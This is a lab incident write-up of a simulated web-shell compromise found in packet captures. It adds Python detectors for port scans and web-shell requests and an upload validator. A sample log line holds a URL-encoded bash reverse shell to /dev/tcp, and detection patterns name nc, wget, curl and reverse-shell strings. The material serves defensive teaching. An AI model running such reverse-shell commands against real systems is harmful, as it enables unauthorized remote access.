Detection and Analysis of Web Shell Activity Through Network Traffic
This analysis was conducted in a simulated lab environment for learning purposes.
Executive Summary
This report analyzes traffic from an internal private IP that began scanning other internal systems. The activity was judged suspicious because a single internal private IP performed reconnaissance via port scanning, followed by command execution through a web shell, indicating a likely system compromise.
Incident Metadata
Incident Type: Web Application Compromise
Data Source: PCAP
Environment: Simulated Lab (BTLO)
Severity: High
Detection & Initial Indicator
Initial indicators included multiple connection attempts to different ports from a single internal private IP within a short timeframe, suggesting reconnaissance activity.
Attack Timeline
Reconnaissance
The attacker attempted to scan various ports to find open ports.
Service Discovery
After scanning, the attacker found that port 80 was open and then conducted further reconnaissance with the gobuster and sqlmap tools.
Initial Access
Upon finding the uploads directory, the attacker chose a web shell technique to gain remote shell access. The attacker injected malicious PHP code containing a web shell into the edit_profile.php file, which allowed commands to be executed through the URL.
Command Execution
The attacker executed commands such as id and whoami and, most critically, a reverse shell command to gain interactive remote shell access to the server.
Post-Exploitation
After obtaining remote shell access, the attacker executed commands such as ls -la and cd into opt, and also attempted to delete one of the PHP files.
Technical Analysis & Evidence
Reconnaissance Activity

This activity indicates that the IP 10.251.96.4 is conducting reconnaissance: it connects to many ports within a short time and at short, regular intervals.
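The reconnaissance pattern described above, many ports on one host from one internal source in a short window, is what the "Alert on abnormal internal port scanning" improvement in the Mitigation section has to catch. The following is an added example of such a detector, not tooling from the original analysis or the BTLO lab. It assumes Zeek conn.log-style records (timestamp, source, destination, destination port, connection state); the sample traffic, the 10-second window and the 15-port threshold are constructed assumptions to be tuned against a real baseline.

```python
"""Detect internal-to-internal port scanning from connection records.

Added example for this writeup; it is not part of the original PCAP analysis
or the BTLO lab.  The record format (Zeek conn.log-style tuples), the sample
traffic and the thresholds are assumptions; tune window/min_ports to the
environment's baseline before alerting on them.
"""
from collections import defaultdict
import ipaddress

# Constructed sample: 10.251.96.4 probes 30 ports (70-99) on 10.251.96.5 within
# about 1.5 s.  Only port 80 completes a handshake (conn_state "SF"); the rest
# are rejected ("REJ"), which is what a scan of a host with one web service looks like.
SAMPLE_CONN = [
    (1000.0 + 0.05 * i, "10.251.96.4", "10.251.96.5", port, "SF" if port == 80 else "REJ")
    for i, port in enumerate(range(70, 100))
]
# Constructed benign traffic: a workstation using the same server's web ports.
SAMPLE_CONN += [
    (1200.0, "10.251.96.7", "10.251.96.5", 80, "SF"),
    (1260.0, "10.251.96.7", "10.251.96.5", 443, "SF"),
]


def is_internal(ip):
    """True for private (RFC 1918 and similar) addresses."""
    return ipaddress.ip_address(ip).is_private


def detect_port_scans(records, window=10.0, min_ports=15):
    """Return {(src, dst): summary} for internal sources that touch at least
    min_ports distinct destination ports on one internal host within window
    seconds.  The summary gives the number of ports probed and which ports
    answered with a completed handshake, i.e. the services the scanner learned about.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, dport, state in records:
        if is_internal(src) and is_internal(dst) and src != dst:
            by_pair[(src, dst)].append((ts, dport, state))

    alerts = {}
    for pair, events in by_pair.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span is at most `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            ports = {p for _, p, _ in events[start:end + 1]}
            if len(ports) >= min_ports and len(ports) > alerts.get(pair, {}).get("ports_probed", 0):
                alerts[pair] = {
                    "ports_probed": len(ports),
                    "responded": sorted({p for _, p, s in events if s == "SF"}),
                }
    return alerts


if __name__ == "__main__":
    for (src, dst), summary in detect_port_scans(SAMPLE_CONN).items():
        print(f"ALERT: {src} probed {summary['ports_probed']} ports on {dst}; "
              f"responding: {summary['responded']}")
```

Reporting the ports that completed a handshake alongside the count is deliberate: it tells the analyst what the scanner actually learned (here, that port 80 is open), which is the starting point for the service discovery phase that followed in this incident.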
Initial Access

This evidence clearly shows that the attacker uploaded malicious PHP code into another PHP file in order to disguise it, something a normal user would not be able to do.
Post-Exploitation / Web Shell Activity


From this evidence we can confirm that the attacker executed commands such as id and whoami to gather further information, then launched a reverse shell and ran further commands once an interactive shell was obtained.
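The web shell traffic described in this section (commands such as id and whoami arriving in the URL of a PHP file under the uploads directory, followed by a reverse shell command) is what the "Monitor HTTP requests containing command execution patterns" improvement below refers to. The following is an added example of that monitoring logic run over access-log lines; it is not tooling from the original analysis or the lab. The log format (Apache combined-style), the sample lines and the token lists are constructed assumptions, and the patterns are a starting point for a rule rather than a complete signature set.

```python
"""Flag HTTP requests whose parameters look like OS commands sent to a web shell.

Added example for this writeup, not the lab's or the author's tooling.  The
access-log format (Apache combined-style) and the sample lines are constructed;
the token list and reverse-shell patterns are a starting point for a detection
rule, not a complete signature set.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines.  As in the incident above, the web shell sits in a
# PHP file under /uploads/ and takes its command from a query parameter.  The last
# line is benign traffic that contains "id" inside a word and must not alert.
SAMPLE_LOG = """\
10.251.96.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.251.96.4 - - [01/Jan/2024:10:05:12 +0000] "GET /uploads/edit_profile.php?cmd=id HTTP/1.1" 200 57
10.251.96.4 - - [01/Jan/2024:10:05:20 +0000] "GET /uploads/edit_profile.php?cmd=whoami HTTP/1.1" 200 12
10.251.96.4 - - [01/Jan/2024:10:06:02 +0000] "GET /uploads/edit_profile.php?cmd=bash+-i+%3E%26+/dev/tcp/10.251.96.4/4444 HTTP/1.1" 200 0
10.251.96.7 - - [01/Jan/2024:10:07:00 +0000] "GET /search.php?q=identity+cards HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) (?P<size>\d+)'
)
# Whole-word shell commands; \b keeps "identity" from matching "id".
COMMAND_TOKENS = re.compile(r'\b(id|whoami|uname|ls|cat|pwd|nc|ncat|bash|sh|wget|curl)\b')
# Strings that only appear when a shell is being pointed back at a remote listener.
REVERSE_SHELL = re.compile(r'/dev/tcp/|\bnc\b.*\s-e\b|\bbash\s+-i\b')


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Inspect the request path and decoded query parameters and return
    {"path", "reasons", "severity"}; severity is None when nothing matched."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)  # decodes %xx and '+'
    reasons = []
    # A PHP script executing from the uploads directory is itself a red flag.
    if parts.path.startswith("/uploads/") and parts.path.endswith(".php"):
        reasons.append("php_under_uploads")
    for key, value in params:
        if REVERSE_SHELL.search(value):
            reasons.append(f"reverse_shell:{key}")
        tok = COMMAND_TOKENS.search(value)
        if tok:
            reasons.append(f"command:{key}={tok.group(1)}")
    if any(r.startswith("reverse_shell") for r in reasons):
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = None
    return {"path": parts.path, "reasons": reasons, "severity": severity}


def scan_log(text):
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify_request(rec["target"])
        if verdict["severity"]:
            alerts.append({"src": rec["src"], "ts": rec["ts"], **verdict})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['src']} {a['path']} {a['reasons']}")
```

Decoding the query string before matching matters: the reverse shell command in the sample arrives URL-encoded, so a rule applied to the raw request line would miss the `>&` redirection and could miss the command tokens entirely. Alerting on any PHP script executing from the uploads path, independent of its parameters, is the cheap control that would have fired at the first web shell request in this incident.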
Impact
If this activity occurred in a production environment, potential impacts would include unauthorized remote access, exposure or manipulation of sensitive data, and the ability for further lateral movement within the network.
Mitigation
Detection Improvements
Alert on abnormal internal port scanning
Monitor HTTP requests containing command execution patterns
Mitigation Actions
Restrict file upload and execution permissions
Implement web application input validation
Enhance logging and monitoring
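The first two mitigation actions, restricting what can be uploaded and where it can execute, are concrete enough to show in code. The following is an added example of an upload validator, not the lab application's code; the compromised site is PHP, but the checks are language-independent and shown here in Python. The assumed policy (only PNG and JPEG images, random storage names, no execute bit, and any PHP open tag refused even inside an otherwise valid image) is an illustration of the principle, not a description of the original application.

```python
"""Upload validation of the kind that would have stopped the web shell above.

Added example, not the lab application's code.  The compromised site is PHP,
but the checks are language-independent and shown here in Python.  Assumed
policy: only PNG and JPEG images are accepted, stored under a random name in a
directory outside the web root, with no execute bit; any file carrying a PHP
open tag is refused regardless of how valid its image header looks.
"""
import os
import secrets
import stat
import tempfile

# Allowed extensions mapped to the magic bytes the content must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
MAX_BYTES = 2 * 1024 * 1024
PHP_TAGS = (b"<?php", b"<?=", b"<script language=\"php\"")

# Constructed inputs for the demonstration below.
GOOD_PNG = ALLOWED["png"] + b"\x00" * 32
PHP_FILE = b"<?php echo 'constructed test payload'; ?>"
POLYGLOT = ALLOWED["png"] + b"\x00" * 8 + PHP_FILE  # valid header, PHP inside


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_upload(filename, data):
    """Return the canonical extension if the upload passes every check, else raise."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # Reject any client-supplied directory component (path traversal).
    if not filename or os.path.basename(filename) != filename:
        raise UploadRejected("path components in filename")
    _, dot, ext = filename.lower().rpartition(".")
    if not dot or ext not in ALLOWED:
        raise UploadRejected("extension not allowed")
    # Content must match what the extension claims.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # Defence in depth: a PHP tag inside an "image" is a classic web shell carrier.
    if any(tag in data for tag in PHP_TAGS):
        raise UploadRejected("embedded PHP tag")
    return ext


def is_accepted(filename, data):
    """Convenience wrapper: True if validate_upload would accept the upload."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(filename, data, upload_dir):
    """Validate, then write under a random name with mode rw-r----- (never executable)."""
    ext = validate_upload(filename, data)
    stored = secrets.token_hex(16) + "." + ext  # the original name never reaches disk
    path = os.path.join(upload_dir, stored)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return stored


def demo_store():
    """Store the constructed PNG in a temp dir; return (has_png_ext, not_executable)."""
    with tempfile.TemporaryDirectory() as d:
        stored = store_upload("avatar.png", GOOD_PNG, d)
        mode = stat.S_IMODE(os.stat(os.path.join(d, stored)).st_mode)
        return stored.endswith(".png"), not (mode & 0o111)


if __name__ == "__main__":
    for fname, data in [("avatar.png", GOOD_PNG), ("edit_profile.php", PHP_FILE),
                        ("shell.png", PHP_FILE), ("avatar.png", POLYGLOT),
                        ("../avatar.png", GOOD_PNG)]:
        print(f"{fname:20s} accepted={is_accepted(fname, data)}")
```

The storage step is as important as the validation: the web server must not be configured to execute scripts from the upload directory at all, and writing files without the execute bit under a name the uploader did not choose removes the attacker's ability to address the file by a known path, which is what made the edit_profile.php web shell usable in this incident.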
Conclusion
The analysis above is a reminder to further harden our security systems, especially web servers, which expose many vulnerabilities. In this case there was no additional validation, which allowed the attacker to upload and inject malicious code.